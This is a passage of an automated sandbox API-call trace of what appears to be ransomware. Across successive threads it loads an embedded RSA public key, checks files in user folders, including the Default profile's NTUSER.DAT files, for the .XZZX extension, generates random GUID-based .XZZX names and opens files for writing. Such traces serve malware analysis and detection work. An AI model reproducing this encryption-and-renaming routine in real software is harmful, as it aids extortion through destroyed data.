LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.345] lstrcpyW (in: lpString1=0x2caf460, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0200.345] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.345] SetErrorMode (uMode=0x1) returned 0x1 [0200.345] lstrcpyW (in: lpString1=0x2caf860, lpString2="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" | out: lpString1="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX" [0200.345] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x478b6861, Data2=0xc332, Data3=0x4927, Data4=([0]=0xad, [1]=0x75, [2]=0xda, [3]=0x51, [4]=0xb8, [5]=0xc5, [6]=0x98, [7]=0x8e))) returned 0x0 [0200.345] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX") returned 85 [0200.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.345] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\29BC45F237C6FE9E478B68613A91E2E6.XZZX") returned 85 [0200.345] StrStrW (lpFirst="BDD25F14384CC362CBD33ADE3C6DA7AA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 776 os_tid = 0xebc [0200.500] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.500] lstrcpyW (in: lpString1=0x2caf460, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0200.500] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.500] SetErrorMode (uMode=0x1) returned 0x1 [0200.500] lstrcpyW (in: lpString1=0x2caf860, lpString2="04BF022041D4F9A43C1202C84609DDEC.XZZX" | out: lpString1="04BF022041D4F9A43C1202C84609DDEC.XZZX") returned="04BF022041D4F9A43C1202C84609DDEC.XZZX" [0200.500] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xfbc05cf1, Data2=0xe458, Data3=0x4ee3, Data4=([0]=0xa9, [1]=0x31, [2]=0x23, [3]=0x55, [4]=0x15, [5]=0x77, [6]=0xfe, [7]=0xb4))) returned 0x0 [0200.500] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\04BF022041D4F9A43C1202C84609DDEC.XZZX") returned 96 [0200.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.500] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\DCE696D8465D4A08FBC05CF149282E50.XZZX") returned 96 [0200.500] StrStrW (lpFirst="04BF022041D4F9A43C1202C84609DDEC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 777 os_tid = 0xec0 [0200.654] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.654] lstrcpyW (in: lpString1=0x2caf460, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0200.654] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.654] SetErrorMode (uMode=0x1) returned 0x1 [0200.654] lstrcpyW (in: lpString1=0x2caf860, lpString2="1CB22AF03A177B10110664B53E3C5F58.XZZX" | out: lpString1="1CB22AF03A177B10110664B53E3C5F58.XZZX") returned="1CB22AF03A177B10110664B53E3C5F58.XZZX" [0200.654] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8a72889, Data2=0x7084, Data3=0x4a3a, Data4=([0]=0xb9, [1]=0xbf, [2]=0xbe, [3]=0xff, [4]=0x85, [5]=0x9, [6]=0xa8, [7]=0xf1))) returned 0x0 [0200.654] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\1CB22AF03A177B10110664B53E3C5F58.XZZX") returned 96 [0200.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.654] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\97ECD6A4209FA5E808A72889236A8A30.XZZX") returned 96 [0200.654] StrStrW (lpFirst="1CB22AF03A177B10110664B53E3C5F58.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 778 os_tid = 0xec4 [0200.810] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.810] lstrcpyW (in: lpString1=0x2caf460, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0200.810] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.810] SetErrorMode (uMode=0x1) returned 0x1 [0200.810] lstrcpyW (in: lpString1=0x2caf860, lpString2="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" | out: lpString1="7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned="7B5559382A0FD2B4C13F23862E44B6FC.XZZX" [0200.810] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x91f79486, Data2=0x22d2, Data3=0x4580, Data4=([0]=0xa2, [1]=0x9f, [2]=0x85, [3]=0xc4, [4]=0x8c, [5]=0xa4, [6]=0xe0, [7]=0xe4))) returned 0x0 [0200.810] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\7B5559382A0FD2B4C13F23862E44B6FC.XZZX") returned 96 [0200.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.810] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\9ED1A1EC0974030091F794860C3EE748.XZZX") returned 96 [0200.810] StrStrW (lpFirst="7B5559382A0FD2B4C13F23862E44B6FC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 779 os_tid = 0xec8 [0200.966] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.966] lstrcpyW (in: lpString1=0x2caf460, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0200.966] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0200.966] SetErrorMode (uMode=0x1) returned 0x1 [0200.966] lstrcpyW (in: lpString1=0x2caf860, lpString2="E3086E520D4EE960428796111173CDA8.XZZX" | out: lpString1="E3086E520D4EE960428796111173CDA8.XZZX") returned="E3086E520D4EE960428796111173CDA8.XZZX" [0200.966] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xab8c2087, Data2=0x17ee, Data3=0x4a3d, Data4=([0]=0x9e, [1]=0xea, [2]=0xc6, [3]=0xa5, [4]=0x23, [5]=0xf2, [6]=0x7f, [7]=0x43))) returned 0x0 [0200.966] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\E3086E520D4EE960428796111173CDA8.XZZX") returned 96 [0200.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.966] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\13325E8206F07FB6AB8C208709BB63FE.XZZX") returned 96 [0200.966] StrStrW (lpFirst="E3086E520D4EE960428796111173CDA8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 780 os_tid = 0xecc [0201.131] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.131] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0201.131] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.131] SetErrorMode (uMode=0x1) returned 0x1 [0201.131] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0201.131] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x4d69f97c, Data2=0xbe58, Data3=0x4a0b, Data4=([0]=0xa2, [1]=0xfb, [2]=0x59, [3]=0xb5, [4]=0xb1, [5]=0x2c, [6]=0x38, [7]=0x90))) returned 0x0 [0201.131] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0201.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.131] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\4397CAA0370D9DC84D69F97C39D88210.XZZX") returned 58 [0201.131] StrStrW (lpFirst="NTUSER.DAT", lpSrch="XZZX") returned 0x0 [0201.131] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT", dwFileAttributes=0x20) returned 0 [0201.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 781 os_tid = 0xed0 [0201.279] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.279] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0201.279] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.279] SetErrorMode (uMode=0x1) returned 0x1 [0201.279] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0201.279] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xdd12680b, Data2=0xe576, Data3=0x4e83, Data4=([0]=0x98, [1]=0x2d, [2]=0x95, [3]=0xe4, [4]=0xf8, [5]=0x98, [6]=0x2d, [7]=0xa8))) returned 0x0 [0201.279] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0201.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.280] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\5D8DCC12465F5F62DD12680B492A43AA.XZZX") returned 58 [0201.280] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="XZZX") returned 0x0 [0201.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG", dwFileAttributes=0x20) returned 0 [0201.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 782 os_tid = 0xed4 [0201.436] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0201.436] lstrcpyW (in: lpString1=0x2caf460, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0201.436] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0201.436] SetErrorMode (uMode=0x1) returned 0x1 [0201.437] lstrcpyW (in: lpString1=0x2caf860, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0201.437] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd08a064, Data2=0x867c, Data3=0x41c0, Data4=([0]=0xbc, [1]=0xa4, [2]=0xbf, [3]=0x26, [4]=0x6b, [5]=0xe3, [6]=0x2c, [7]=0x39))) returned 0x0 [0201.437] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0201.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0201.437] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\D4220870228A59000D08A06425553D48.XZZX") returned 58 [0201.437] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="XZZX") returned 0x0 [0201.437] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x20) returned 0 [0201.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 783 os_tid = 0xed8 [0201.590] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 